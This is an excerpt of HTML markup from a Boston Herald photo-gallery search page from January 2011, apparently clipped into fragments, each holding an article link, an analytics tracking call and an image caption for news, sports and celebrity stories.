    <img id="198114" src="http://multimedia.heraldinteractive.com/images/20110128/stp/550ed9_BC_01282011.jpg" title="CAN&#x2019;T TAKE IT AWAY: Boston College&#x2019;s Kristen Doherty (left) and Carolyn Swords surround Florida State&#x2019;s Chasity Clayton during the Eagles&#x2019; 102-93 loss last night."
alt="Matt Stone" style="margin:0 2px" />

</a>
...[SNIP]...
le="Snow business cancels Julianne Moore&rsquo;s Hasty Pudding outing"
onclick="switchPhoto('198084');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198084" src="http://multimedia.heraldinteractive.com/images/20110127/stp/33907a_moore_01282011.jpg" title="Julianne Moore hams it up with Harvard&rsquo;s Hasty Pudding Theatrical crew in drag as she receives the 2011 Woman of the Year award at Harvard."
alt="Nancy Lane" style="margin:0 2px" />

</a>
...[SNIP]...
.bg?articleid=1312479" title="Senior Bowl LBs overcame serious scares"
onclick="switchPhoto('198082');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198082" src="http://multimedia.heraldinteractive.com/images/20110127/stp/6a0551_ltpherzlich.jpg" title="North squad&rsquo;s Mark Herzlich of Boston College, talks with scouts following Senior Bowl NCAA college football practice in Mobile, Ala. yesterday. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
articleid=1312394" title="Ravens&rsquo; Ed Reed remembers his brother"
onclick="switchPhoto('198025');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198025" src="http://multimedia.heraldinteractive.com/images/20110127/stp/e15182_ereed012711.jpg" title="Ravens player Ed Reed speaks at a news conference about the apparent recovery of his brother&rsquo;s body from the Mississippi River, at the St. Charles Parish Sheriff headquarters in Luling, La., Wednesday."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
articleid=1312387" title="Fast storm collapses roof; city towing cars"
onclick="switchPhoto('198067');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198067" src="http://multimedia.heraldinteractive.com/images/20110127/stp/e017a9_ltp012711collapsemg07.jpg" title="Officials stand by during the rescue of two men from a roof collapse in Lynn this morning."
alt="Mark Garfinkel" style="margin:0 2px" />

</a>
...[SNIP]...
articleid=1312387" title="Fast storm collapses roof; city towing cars"
onclick="switchPhoto('198049');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198049" src="http://multimedia.heraldinteractive.com/images/20110127/stp/edc277_ltpLynncar012711.jpg" title="A car where two workers were buried inside of is seen in Lynn this morning. Rescue personnel successfully rescued the occupants, who sustained minor injuries."
alt="Mark Garfinkel" style="margin:0 2px" />

</a>
...[SNIP]...
cleid=1312351" title="Harrison Barnes lifts North Carolina past Miami"
onclick="switchPhoto('197996');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197996" src="http://multimedia.heraldinteractive.com/images/20110127/stp/e8e0fe_hbarnes012711.jpg" title="North Carolina&rsquo;s Harrison Barnes (40) shoots as Miami&rsquo;s Reggie Johnson (42) defends in the first half of an NCAA college basketball game in Coral Gables, Fla., Wednesday."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
eid=1312346" title="Snowstorm wallops Northeast, piling on the misery"
onclick="switchPhoto('197992');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197992" src="http://multimedia.heraldinteractive.com/images/20110127/stp/cf9ea2_weather012711.jpg" title="This NOAA satellite image taken Thursday, Jan. 27, 2011 at 12:45 a.m. EST shows comma shaped cloud cover over New England and the western Atlantic Ocean as a strong winter storms brings significant snowfall and strong winds to New England. "
alt="Weather Underground/AP" style="margin:0 2px" />

</a>
...[SNIP]...
articleid=1312330" title="Turnaround by Tim Thomas a Bruins highlight"
onclick="switchPhoto('198039');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198039" src="http://multimedia.heraldinteractive.com/images/20110127/stp/c3e090_ltpThomasgoalie012711.jpg" title="Bruins goalie Tim Thomas makes a stop in the second period."
alt="Matt Stone" style="margin:0 2px" />

</a>
...[SNIP]...
le="We Hear: Kenny Chesney, Natalie Jacobson, Kate Bosworth & more..."
onclick="switchPhoto('198022');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198022" src="http://multimedia.heraldinteractive.com/images/20110127/stp/df859e_kchesney012711.jpg" title="Kenny Chesney."
alt="AP (File)" style="margin:0 2px" />

</a>
...[SNIP]...
le="Tracked Down: Shaquille O&rsquo;Neal, F. Murray Abraham & more..."
onclick="switchPhoto('197945');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197945" src="http://multimedia.heraldinteractive.com/images/20110126/stp/5ffe30_Shaq_01272011.jpg" title="Tom O&#x2019;Brien and Tanner Webb with Shaquille O&#x2019;Neal."
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
view.bg?articleid=1312304" title="Enhancing the magic on land and sea"
onclick="switchPhoto('197966');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197966" src="http://multimedia.heraldinteractive.com/images/20110127/stp/f64e50_mick_01272011.jpg" title="IT&#x2019;S A SMALL WORLD: Mickey and Minnie welcome the Disney Dream at Port Canaveral, Fla., earlier this month."
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
leid=1312240" title="NJ man says he killed UK tourist in self-defense"
onclick="switchPhoto('197896');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197896" src="http://multimedia.heraldinteractive.com/images/20110126/stp/e03fb8_davies_01262011.jpg" title="Robert Davies, stands in the Atlantic County Criminal Courthouse in Mays Landing, N.J. Davies admitted Wednesday Jan. 26, 2011 that he killed Lavern Paul Ritch, one of Britain&rsquo;s most eligible bachelors more than three years ago."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
eid=1312225" title="Tiger Woods looks for fresh start at Torrey Pines"
onclick="switchPhoto('197889');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197889" src="http://multimedia.heraldinteractive.com/images/20110126/stp/281a03_tiger.jpg" title="Tiger Woods listens to a question during a news conference at the Farmers Insurance Open golf tournament in San Diego, Wednesday."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
articleid=1312123" title="Memorial at site of Auschwitz oven builders"
onclick="switchPhoto('197838');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197838" src="http://multimedia.heraldinteractive.com/images/20110126/stp/23a3a4_ltpHolocaustmemorial012611.jpg" title="A man stands in the exhibition &lsquo;The Engineers of the &rsquo;Final Solution&rsquo; Topf & Sons - Builders of the Auschwitz Ovens&rsquo; after a press conference in Erfurt, central Germany, on Tuesday, Jan. 25, 2011."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
view.bg?articleid=1312089" title="J.D. Salinger secrets remain secret"
onclick="switchPhoto('197799');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197799" src="http://multimedia.heraldinteractive.com/images/20110126/stp/283152_jdsalinger012611.jpg" title="In this Jan. 28, 2010 file photo, copies of J.D. Salinger&rsquo;s classic novel &lsquo;The Catcher in the Rye&rsquo; are seen at the Orange Public Library in Orange Village, Ohio."
alt="AP (File)" style="margin:0 2px" />

</a>
...[SNIP]...
id=1312082" title="Friends: Ore. officer shooting suspect is paranoid"
onclick="switchPhoto('197785');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197785" src="http://multimedia.heraldinteractive.com/images/20110126/stp/9c40d7_swat012611.jpg" title="Oregon State Police Swat members climb out of a armored vehicle during a search of a home in the Bayshore community Tuesday in Waldport , Ore. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
e="Tracked Down: Chris Lambton, Robert Plant, Jordan Knight & more..."
onclick="switchPhoto('197742');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197742" src="http://multimedia.heraldinteractive.com/images/20110125/stp/e312f8_Lamb_01272011.jpg" title="&#x2018;The Bachelorette&#x2019; wash-outs Chris Lambton and Kasey Kahl at the Celtics-Cavs game."
alt="Matthew West" style="margin:0 2px" />

</a>
...[SNIP]...
articleid=1312053" title="FACT CHECK: Obama and his imbalanced ledger"
onclick="switchPhoto('197739');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197739" src="http://multimedia.heraldinteractive.com/images/20110125/stp/bf8b87_Bohener_01272011.jpg" title="House Speaker John Boehner watches as President Barack Obama delivers his State of the Union address on Capitol Hill."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
business/general/view.bg?articleid=1312013" title="Heating costs soar"
onclick="switchPhoto('197749');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197749" src="http://multimedia.heraldinteractive.com/images/20110126/stp/898a0e_heat_01262011.jpg" title="FILLING UP THE TANKS: Harry Allen, owner of Arlmont Fuel Corp., pulls the hose from his truck while making an oil delivery in Arlington."
alt="Stuart Cahill" style="margin:0 2px" />

</a>
...[SNIP]...
</b> President Obama&rsquo;s State of Union address"
onclick="switchPhoto('197734');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197734" src="http://multimedia.heraldinteractive.com/images/20110125/stp/351973_SOTU_01262011.jpg" title="President Obama arrives at the podium just prior to delivering his State of the Union address as Vice President Joe Biden and House Speaker John Boehner applaud."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
ew.bg?articleid=1311916" title="Japan, Australia into Asian Cup final"
onclick="switchPhoto('197683');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197683" src="http://multimedia.heraldinteractive.com/images/20110125/stp/7f3550_asia.jpg" title="Australia&rsquo;s players celebrate at the end of their 2011 Asian Cup semi-final football match against Uzbekistan in the Qatari capital Doha on January 25, 2011. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
ticleid=1311847" title="List of 83rd annual Academy Award nominations"
onclick="switchPhoto('197712');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197712" src="http://multimedia.heraldinteractive.com/images/20110125/stp/574dff_ltptfighter.jpg" title="Christian Bale and Mark Wahlberg, right, appear in &#x201C;The Fighter.&#x201D; The Lowell-based flick was nominated for 7 Academy Awards, including best picture, and Bale for best supporting actor. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
806" title="Girl killed in Wash. state shootout may have been runaway"
onclick="switchPhoto('197613');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197613" src="http://multimedia.heraldinteractive.com/images/20110125/stp/f1a78a_shooting012511.jpg" title="Sarah Bastura, of Port Orchard, Wash., left, lights a candle for the four people who were shot Sunday in front of a Walmart store in Port Orchard, Monday."
alt="Ellen M. Banner/The Seattle Times" style="margin:0 2px" />

</a>
...[SNIP]...
?articleid=1311804" title="A Twitter apology for the former Mrs. Shaq"
onclick="switchPhoto('197624');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197624" src="http://multimedia.heraldinteractive.com/images/20110125/stp/b68d99_oneals012511.jpg" title="Va&rsquo;Shaundya (Shaunie) and Shaquille O&#x2019;Neal in happier times."
alt="AP (File)" style="margin:0 2px" />

</a>
...[SNIP]...
11803" title="We Hear: Jay Leno, Josh Beckett, Zona Jones and more..."
onclick="switchPhoto('197606');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197606" src="http://multimedia.heraldinteractive.com/images/20110125/stp/d33d45_jayl_01252011.jpg" title="Jay Leno"
alt="Herald file" style="margin:0 2px" />

</a>
...[SNIP]...
al/view.bg?articleid=1311802" title="Water pipe break routs residents"
onclick="switchPhoto('197594');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197594" src="http://multimedia.heraldinteractive.com/images/20110125/stp/a3a915_evac_01252011.jpg" title="Residents of 660 Washington Street (The Archstone Building) in Downtown Crossing were evacuated due to a water main break in their building."
alt="Matthew West" style="margin:0 2px" />

</a>
...[SNIP]...
eid=1311794" title="Homeless woman shuns shelter as temps turn deadly"
onclick="switchPhoto('197569');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197569" src="http://multimedia.heraldinteractive.com/images/20110124/stp/a26b54_home_01252011.jpg" title="Susan Bakerjones, a homeless woman who refuses to seek a shelter, lives in a tent year round, even when it is bitter cold. "
alt="Matt Stone" style="margin:0 2px" />

</a>
...[SNIP]...
eid=1311794" title="Homeless woman shuns shelter as temps turn deadly"
onclick="switchPhoto('197654');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197654" src="http://multimedia.heraldinteractive.com/images/20110125/stp/0f1e24_ltp012411homelessms01.jpg" title=" Susan Bakerjones, a homeless woman who refuses to seek a shelter, looks out from the tent she calls home during Monday&#x2019;s bitter cold. "
alt="Matt Stone" style="margin:0 2px" />

</a>
...[SNIP]...
icleid=1311790" title="At least Tom Brady still wins the hearts of GQ"
onclick="switchPhoto('197574');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197574" src="http://multimedia.heraldinteractive.com/images/20110124/stp/147606_brady_01252011.jpg" title="Tom Brady cradles a baby goat in a 2005 GQ spread."
alt="GQ" style="margin:0 2px" />

</a>
...[SNIP]...
eid=1311785" title="&lsquo;Idol&rsquo; hopeful&rsquo;s Pop a Hub fave"
onclick="switchPhoto('197572');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197572" src="http://multimedia.heraldinteractive.com/images/20110124/stp/1de6a0_idol_01252011.jpg" title="&#x2018;American Idol&#x2019; hopeful Ashley Sullivan of
Tewksbury poses prior to performing for the judges."
alt="Michael Becker/Fox/ Picture Group Photo" style="margin:0 2px" />

</a>
...[SNIP]...
television/reviews/view.bg?articleid=1311761" title="Mommie dreariest"
onclick="switchPhoto('197591');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197591" src="http://multimedia.heraldinteractive.com/images/20110125/stp/f53a13_rivers_01252011.jpg" title="GENERATION GAP: Joan and Melissa Rivers clash in &#x2018;Joan & Melissa: Joan Knows Best?,&#x2019;
their new unscripted series premiering tonight on WE tv."
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
eid=1311749" title="Cumberland Farms testing drive-thru grocery store"
onclick="switchPhoto('197579');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197579" src="http://multimedia.heraldinteractive.com/images/20110125/stp/8961d4_cumb_01252011.jpg" title="HAND IT TO THEM: Cumberland Farms is testing a drive-thru window at its store in Kingston &#x2014; the first of its kind in New England &#x2014; where all items are
available to customers who never have to leave their cars."
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
id=1311718" title="NFL will close Cowboys Stadium roof for Super Bowl"
onclick="switchPhoto('197557');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197557" src="http://multimedia.heraldinteractive.com/images/20110124/stp/0ad2c1_super.jpg" title="A worker on a lift makes some final adjustments to the word Super along the North side of Cowboys Stadium, site of Super Bowl XLV NFL football game, Friday, in Arlington, Texas. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
z&rsquo; offers new insight into Chaz Bono&rsquo;s transition to male"
onclick="switchPhoto('197528');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197528" src="http://multimedia.heraldinteractive.com/images/20110124/stp/634a5f_ltpchazbono.jpg" title="Chaz Bono, left, subject of the documentary film \"Becoming Chaz,\" poses with his girlfriend Jennifer Elia at the premiere of the film at the 2011 Sundance Film Festival in Park City, Utah yesterday. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
atriots/view.bg?articleid=1311662" title="Tom Brady unanimous All-Pro"
onclick="switchPhoto('197533');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197533" src="http://multimedia.heraldinteractive.com/images/20110124/stp/efa1ad_ltpbrady3.jpg" title="Patriots quarterback Tom Brady was named a unanimous All-Pro selection today."
alt="Matt Stone (File)" style="margin:0 2px" />

</a>
...[SNIP]...
id=1311661" title="Judge allows NY beheading suspect to be own lawyer"
onclick="switchPhoto('197520');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197520" src="http://multimedia.heraldinteractive.com/images/20110124/stp/1b4631_hass.jpg" title="This undated file photo provided by Bridges TV shows Muzzammil Hassan and his wife Aasiya Zubair Hassan of Orchard Park, N.Y., at the the Muslim-oriented television the couple ran. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
cleid=1311614" title="2 Florida officers, suspect killed in firefight"
onclick="switchPhoto('197491');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197491" src="http://multimedia.heraldinteractive.com/images/20110124/stp/0c480c_shoot.jpg" title="An armed police officer stands near rescue vehicles about a block away from where a U.S. Marshal and two St. Petersburg police officers were shot while trying to serve an arrest warrant Monday, in south St. Petersburg, Fla. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
.bg?articleid=1311581" title="Dustin Pedroia hangs with the big dawgs"
onclick="switchPhoto('197478');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197478" src="http://multimedia.heraldinteractive.com/images/20110124/stp/c9d99f_pedroia012411.jpg" title="Dustin Pedroia continues his sponsorship deal as Sullivan Tire spokesperson. He filmed a commercial Wednesday with &lsquo;Misty.&rsquo;"
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
0" title="4 Detroit officers hurt in precinct shooting; gunman killed"
onclick="switchPhoto('197473');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197473" src="http://multimedia.heraldinteractive.com/images/20110124/stp/6dd69e_detroit012411.jpg" title="Detroit police point to a broken window at the precinct 6 building in northwest Detroit where a gunman walked into the police station and opened fire injuring three police officers, Sunday."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
itle="We Hear: Josh Beckett, Lamar Odom, Khloe Kardashian and more..."
onclick="switchPhoto('197447');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197447" src="http://multimedia.heraldinteractive.com/images/20110123/stp/ccc6fe_josh_01242011.jpg" title="Josh Beckett."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
"Tracked Down: Maria Menounos, John Henry, Martha Coakley and more..."
onclick="switchPhoto('197446');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197446" src="http://multimedia.heraldinteractive.com/images/20110123/stp/d5e151_henry_01242011.jpg" title="John Henry and his wife, Linda, left, and Big Brothers Big Sisters
CEO Wendy Foster attend the agency&#x2019;s Big 12 Gala."
alt="John Kreis" style="margin:0 2px" />

</a>
...[SNIP]...
="Story of Nancy Kerrigan and Tonya Harding comes alive in rock opera"
onclick="switchPhoto('197445');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197445" src="http://multimedia.heraldinteractive.com/images/20110123/stp/a3db6f_ice_01242011.jpg" title="Figure skaters Nancy Kerrigan, left, and Tonya Harding practice
at the 1994 Winter Olympics at Hamar Olympic Ampitheater in Hamar, Norway, just weeks after Kerrigan was attacked."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
"/news/regional/view.bg?articleid=1311518" title="Cold, hard truth..."
onclick="switchPhoto('197443');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197443" src="http://multimedia.heraldinteractive.com/images/20110123/stp/7de6bf_walk_01242011.jpg" title="BONE-CHILLING: Bundled-up walkers make&#x2028;their way along the beach off Day Boulevard &#x2028;in South Boston yesterday.
"
alt="Matthew Healey" style="margin:0 2px" />

</a>
...[SNIP]...
leid=1311505" title="Gunman shoots 4 officers inside Detroit precinct"
onclick="switchPhoto('197436');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197436" src="http://multimedia.heraldinteractive.com/images/20110123/stp/b83f4f_police_01242011.jpg" title="Detroit police stand outside the precinct 6 building in northwest Detroit where police say a gunman walked into the police station and opened fire injuring three officers. Police returned fire, killing the gunman. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
11413" title="China&rsquo;s new stealth fighter may use US technology"
onclick="switchPhoto('197358');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197358" src="http://multimedia.heraldinteractive.com/images/20110123/stp/c2cb1a_china.jpg" title="In this Jan. 20, 2011 photo Zoran Milicevic, museum deputy executive speaks and gestures in front of the wing of an U.S. F-117A stealth fighter, downed during the 78-day air-campaign against Yugoslavia, at Belgrade&rsquo;s aviation museum, Serbia. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
eral/view.bg?articleid=1311411" title="USA-Chile draw 1-1 in friendly"
onclick="switchPhoto('197355');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197355" src="http://multimedia.heraldinteractive.com/images/20110123/stp/2c3b55_us.jpg" title="Chile&rsquo;s Juan Abarca, right, and United States&rsquo; Juan Agudelo, second from right, battle for the ball as USA&rsquo;s Alejandro Bedoya, second from left, and Sean Franklin look on during the second half of their soccer friendly match, Saturday."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
="Tracked Down: Tyler Seguin, Kim Kardashian, Tom Brady Sr. & more..."
onclick="switchPhoto('197323');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197323" src="http://multimedia.heraldinteractive.com/images/20110122/stp/4b4a61_Kardashian_01232011.jpg" title="Boston Latino TV host Tim Estiloz and reality TV gal Kim Kardashian in La-La."
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
="Tracked Down: Tyler Seguin, Kim Kardashian, Tom Brady Sr. & more..."
onclick="switchPhoto('197324');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197324" src="http://multimedia.heraldinteractive.com/images/20110122/stp/f1c7bf_Seguin_01232011.jpg" title="Bruins rookie Tyler Seguin has a &#x2018;heart&#x2019; at Sanborn Elementary School in Andover."
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
?articleid=1311375" title="C&rsquo;s family &lsquo;Meal&rsquo; ticket"
onclick="switchPhoto('197322');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197322" src="http://multimedia.heraldinteractive.com/images/20110122/stp/17caa1_Ladies_01232011.jpg" title="From left, Ashley Bachelor, Brandi Garnett, Shannon Allen and Julie Pierce attend the &#x2018;Pre-Game Meal&#x2019; launch party at Winston Flowers in Chestnut Hill."
alt="Michael Blanchard photography" style="margin:0 2px" />

</a>
...[SNIP]...
nal/view.bg?articleid=1311366" title="Revere victim hailed by friends"
onclick="switchPhoto('197369');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197369" src="http://multimedia.heraldinteractive.com/images/20110123/stp/b19601_012111murderce002.jpg" title="Stephanie Moulton"
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
="/entertainment/travel/view.bg?articleid=1311353" title="Double down"
onclick="switchPhoto('197375');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197375" src="http://multimedia.heraldinteractive.com/images/20110123/stp/8e5a2c_dali.jpg" title="This Monday, Jan. 10, 2011 photo shows a 1953 portrait of Salvador Dali, by Philippe Halsman and purchased by the Salvador Dali Museum, as it hangs in one of the galleries at the museum in St. Petersburg, Fla. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
="/entertainment/travel/view.bg?articleid=1311353" title="Double down"
onclick="switchPhoto('197374');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197374" src="http://multimedia.heraldinteractive.com/images/20110123/stp/fe87f5_dalib.jpg" title="This Monday, Jan. 10, 2011 photo shows one of the galleries at the new Salvador Dali Museum in St. Petersburg, Fla. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
="/entertainment/travel/view.bg?articleid=1311353" title="Double down"
onclick="switchPhoto('197376');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197376" src="http://multimedia.heraldinteractive.com/images/20110123/stp/b1b8a5_muse.jpg" title="This Monday, Jan. 10, 2011 photo shows a photographer as he shoots through the windows in the new Salvador Dali Museum in St. Petersburg, Fla."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
politics/view.bg?articleid=1311347" title="The Ballad of Chuck Turner"
onclick="switchPhoto('197313');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197313" src="http://multimedia.heraldinteractive.com/images/20110122/stp/13ee1c_Sing_01232011.jpg" title="EMBATTLED &#x2018;HYMN&#x2019;: Members of the Raging Grannies serenade Chuck Turner yesterday at an event in Cambridge."
alt="Christopher Evans" style="margin:0 2px" />

</a>
...[SNIP]...
08" title="Tom Brady&rsquo;s guru didn&rsquo;t see any problems afoot"
onclick="switchPhoto('197407');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197407" src="http://multimedia.heraldinteractive.com/images/20110123/stp/9fc13e_ltptomb20110123.jpg" title="Tom Brady"
alt="Herald file" style="margin:0 2px" />

</a>
...[SNIP]...
al/view.bg?articleid=1311306" title="Pictures worth a thousand smiles"
onclick="switchPhoto('197315');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197315" src="http://multimedia.heraldinteractive.com/images/20110122/stp/67af39_powell_01232011.JPG" title="&#x2018;SOMETHING TO HANG ONTO&#x2019;: Artist Cristina Powell, 22, who suffers from cerebral palsy, takes a phone call inside her gallery at Floating Hospital for Children at Tufts Medical Center."
alt="Faith Ninivaggi" style="margin:0 2px" />

</a>
...[SNIP]...
tball/celtics/view.bg?articleid=1311294" title="Green implode on road"
onclick="switchPhoto('197341');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197341" src="http://multimedia.heraldinteractive.com/images/20110123/stp/7d4b92_Cs_01232011.jpg" title="IN YOUR FACE: The Wizards&#x2019; Andray Blatche dunks the ball over the Celtics&#x2019; Glen Davis (11), as Kevin Garnett (5) and Paul Pierce stand by, last night in Washington. Blatche and the Wizards battled back to score an 85-83 win against the C&#x2"
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
1252" title="Steelers DL Aaron Smith continues 3-month wait to return"
onclick="switchPhoto('197266');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197266" src="http://multimedia.heraldinteractive.com/images/20110122/stp/15dd12_smith.jpg" title="Pittsburgh Steelers defensive end Aaron Smith, right, talks with defensive coordinator Dick LeBeau before NFL football practice, Wednesday, Jan. 19, 2011, in Pittsburgh. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
1170" title="Future of Sudan&rsquo;s Darfur uncertain post-referendum"
onclick="switchPhoto('197201');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197201" src="http://multimedia.heraldinteractive.com/images/20110122/stp/629051_darf.jpg" title=" In this March 23, 2009 file photo, Two UNAMID peacekeepers patrol by trucks loaded with new arrivals of displaced Sudanese at Zamzam refugee camp, outside the Darfur town of al-Fasher, Sudan. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
al_estate/view.bg?articleid=1311127" title="Stylish duplex in Southie"
onclick="switchPhoto('197161');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197161" src="http://multimedia.heraldinteractive.com/images/20110121/stp/30fd84_Real_01202011.jpg" title="CONTEMPORARY LOOK: Unit 3 at 50 Athens St. in South Boston features a full-wall cherrywood built-in media unit in the living/dining area."
alt="Angela Rowlings" style="margin:0 2px" />

</a>
...[SNIP]...
/view.bg?articleid=1311006" title="Who&rsquo;s afraid of Paul Pierce?"
onclick="switchPhoto('197081');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197081" src="http://multimedia.heraldinteractive.com/images/20110121/stp/b89b7f_ltpPierceA012111.jpg" title="The Celtics&rsquo; Paul Pierce hams it up with custodian Paul Smith, left, and fifth grader Jayla Belcher as they perform a skit about the Three Little Pigs at the John Winthrop Elementary School in Dorchester yesterday."
alt="Nancy Lane" style="margin:0 2px" />

</a>
...[SNIP]...
ticleid=1310990" title="Steven Tyler&rsquo;s their &lsquo;Idol&rsquo;"
onclick="switchPhoto('197091');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197091" src="http://multimedia.heraldinteractive.com/images/20110121/stp/794842_ltpTyler012111.jpg" title="Steven Tyler, a new judge on &lsquo;American Idol,&rsquo; looks on during a panel discussion on the show at the FOX Broadcasting Company Television Critics Association winter press tour in Pasadena, Calif., Tuesday, Jan. 11, 2011."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
Down: Jenny McCarthy, BenJarvus Green-Ellis, Kevin Faulk and more..."
onclick="switchPhoto('197034');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197034" src="http://multimedia.heraldinteractive.com/images/20110120/stp/0abd7f_jenn_01212011.jpg" title="Tryst chef Paul Turano and Hollywood hottie Jenny McCarthy."
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
.bg?articleid=1310981" title="Life Is Sweet Aboard the SS Heinz-Kerry"
onclick="switchPhoto('197033');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197033" src="http://multimedia.heraldinteractive.com/images/20110120/stp/736880_kerry_01212011.jpg" title="Sen. John Kerry, wife Teresa Heinz and daughter Alexandra being ferried to the
dock in St. Barts in a rubber raft."
alt="StarTraks" style="margin:0 2px" />

</a>
...[SNIP]...
leid=1310853" title="Paul the Octopus memorialized at German aquarium"
onclick="switchPhoto('197005');
